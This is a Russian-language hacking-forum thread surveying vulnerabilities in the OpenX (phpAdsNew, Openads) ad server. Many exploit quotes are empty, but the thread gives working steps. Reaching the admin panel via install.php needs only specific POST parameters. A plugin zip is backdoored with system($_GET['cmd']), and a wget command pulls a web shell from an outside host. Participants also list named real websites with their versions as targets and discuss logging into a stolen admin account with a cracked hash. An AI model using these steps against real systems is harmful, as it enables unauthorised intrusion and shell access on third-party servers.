![]() |
[ Обзор уязвимостей OpenX (phpAdsNew, Openads) ]
Обновлено 21.04.2010 (Спасибо всем за активность)
[ + ] Общая информация: Сайт: http://openx.org Текущая версия: OpenX 2.8.5 [ + ] Краткий экскурс в названия: phpAdsNew, Openads, OpenX - это название одного продукта, которое менялось в течении времени. phpAdsNew - название движка c версии 2.0 до 2.0.9 Openads - название движка c версии 2.0.10 до 2.4.3 OpenX - название движка c версии 2.4.4 до настоящего момента [ + ] Структура БД: >> ветка OpenX 2.6; OpenX 2.8 Цитата:
Цитата:
Цитата:
[ + ] Уязвимости для всей ветки OpenX 2.0 [phpAdsNew все версии, Openads до 2.0.11-pr1 включительно] >> Раскрытие пути условия: + display_errors = On сплоит: Цитата:
Цитата:
условия: + register_globals = On сплоит: Цитата:
условия: + $phpAds_config['type_html_php'] = true; // default false + наличие html баннера + register_globals = On сплоит: Цитата:
>> Local File Include http://securityreason.com/achievement_securityalert/21 сплоит: Цитата:
[ + ] Уязвимости phpAdsNew 2.0 - 2.0.4-pr2 >> Выполнение php кода (XML-RPC Library Remote Code Execution) http://www.securityfocus.com/bid/14088/info сплоит: Цитата:
>> Раскрытие пути http://securityreason.com/achievement_securityalert/9 условия: + display_errors = On сплоит: Цитата:
http://securityreason.com/achievement_securityalert/9 сплоит: Цитата:
>> Выполнение php кода сплоит: Цитата:
OpenX 2.4.4 - 2.4.9 Openads 2.4.0 - 2.4.3 >> Local File Include http://milw0rm.org/exploits/7883 Условия: + magic_quotes_gpc = Off сплоит: Цитата:
[ + ] Уязвимости OpenX 2.6.0 - 2.6.1 OpenX 2.4.4 - 2.4.8 Openads 2.4.0 - 2.4.3 >> SQL injection Есть сплоит на milw0rm - мало того что написан как blind sql injection, хотя там обычная инъекция с выводом X_X, так он ещё и корявый, писал какой-то калека. сплоит для OpenX 2.6.0 - 2.6.1: Цитата:
сплоит для OpenX 2.4.4 - 2.4.8 Openads 2.4.0 - 2.4.3: Цитата:
[ + ] Уязвимости OpenX 2.6.0 - 2.6.4 OpenX 2.4.4 - 2.4.10 Openads 2.4.0 - 2.4.3 >> Blind sql injection условия: + magic_quotes_gpc = Off Описаниe: http://resources.enablesecurity.com/advisories/openx-2.6.4-multiple.txt [ + ] Уязвимости OpenX 2.8.0 - 2.8.5 >> Раскрытие пути условия: + display_errors = On сплоит: Цитата:
>> Обход аутентификации пользователя сплоит: Цитата:
>> Раскрытие установочной информации сплоит: Цитата:
Цитата:
|
Загрузка шелла
Универсальный способ загрузки шелла.
условия: + Доступность на запись файла config.inc.php Описание: >> Для ветки OpenX 2.0 1. Цитата:
1. Цитата:
1. Цитата:
1. Цитата:
Цитата:
Цитата:
Цитата:
|
OpenX 2.8.2, раскрытие пути:
/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php /www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php /www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php /www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php |
Уязвимости OpenX 2.8.0
запрашиваем http:/site.com/openx/www/admin/install.php оказываемся в админке если есть права на запись в кофиг фаил заливаем шелл Уязвимости OpenX 2.8.2 В паблике реализации уязвимости пока не видел : запрашиваем: http:/site.com/openx/www/admin/install.php передаём постом параметры : btn_openads=1&btn_plugins=1 попадаем в админку заливаем шелл ) узязвимый код в install.php : PHP код:
PHP код:
Альтернативный спосов заливки shell Берем стандартный плагин для openx из папки etc/plugins/ скрипта установки. Добавляем в начало любого из файлов system($_GET['cmd']) для примера : Открываем openX3rdPartyServers.zip и в /plugins/3rdPartyServers/ox3rdPartyServers/ файлу архива добавляем к adtech.class.php system($_GET['cmd']) сохраняем имеем универсальный шелл для версий выше 2.6 Для заливки шелла заходим в админку жмякаем кнопку плагинс в 2,8 версии (В 2,6 тыкаем конфиг->плагинс )в открышемся вкладке такаем кнопку обзор выбераем где у нас хранится наш изменённый openX3rdPartyServers.zip жмякаем на кнопку import code нажимаем кнопку конфиг и наш шелл подгружается ))) или по прямому адресу http:/site.com/openx/plugins/3rdPartyServers/ox3rdPartyServers/adtech.class.php )))))) ещём другую папку доступную для записи к примеру www/images/ (всегда доступна на запись ) и заливаем полноценный шелл к примеру (если есть wget) "cd ../images/ && wget -O shell.php http://shell.com/shell.txt") по адресу *www/images/shell.php имеем полноценный шелл |
OpenX 2.8.0
OpenX 2.8.2 OpenX 2.8.3 Пока раскрытие установчной директории скрипта и некоторые настройки сервера: Код:
http://url.com/openx/www/admin/install.phpbtn_openads=1&btn_syscheck=1 Рабочий пример: igromania.ru http://bs.igromania.ru/www/admin/install.php |
(Dm), спасибо огромное за обзор и остальным также.
Но есть вопрос - добыл из базы хеш и логин, хеш брученый был уже, поэтому ввел логин и пасс в админку - но мне пишет, что нужно включить куки для авторизации. Куки, естественно, включены. Из-за чего такое может быть? |
2попугай а openx вообше выдает баннеры на страницу ? :)
Я тут вот по какому вопросу зашел ))) http://securityreason.com/wlb_show/WLB-2010010098 кто нить что нибудь понимает ? лично я нет, где там иньекция ,сижу втупляю не могу не хрена понять :D и вообше какое это отношение к самому движку имеет то ? (( |
Цитата:
А насчет инъекции - может у тебя версия другая? |
openx.pmgnews.com/www/admin/index.php - 2.8.1
arkansas-catholic.org/adserver/www/admin/index.php - 2.8.1 ikeafans.com/openx/www/admin/index.php - 2.8.2 mondofacto.com/openx/www/admin/index.php - 2.8.2 ultimatecampresource.com/openads/www/admin/index.php - 2.8.3 a.soft32.com/www/admin/index.php - 2.8.3 почему не работает install.php этой ссылки? |
Цитата:
http://a.soft32.com/www/admin/install.php Код:
/var/vhost/openx/var OKКод:
/data/www/openx/var OKи так далее.... ты видимо не внимательно читал ... написано же , что обратится надо к скрипту install.php c POST параметрами btn_openads=1&btn_syscheck=1 |
| Время: 08:24 |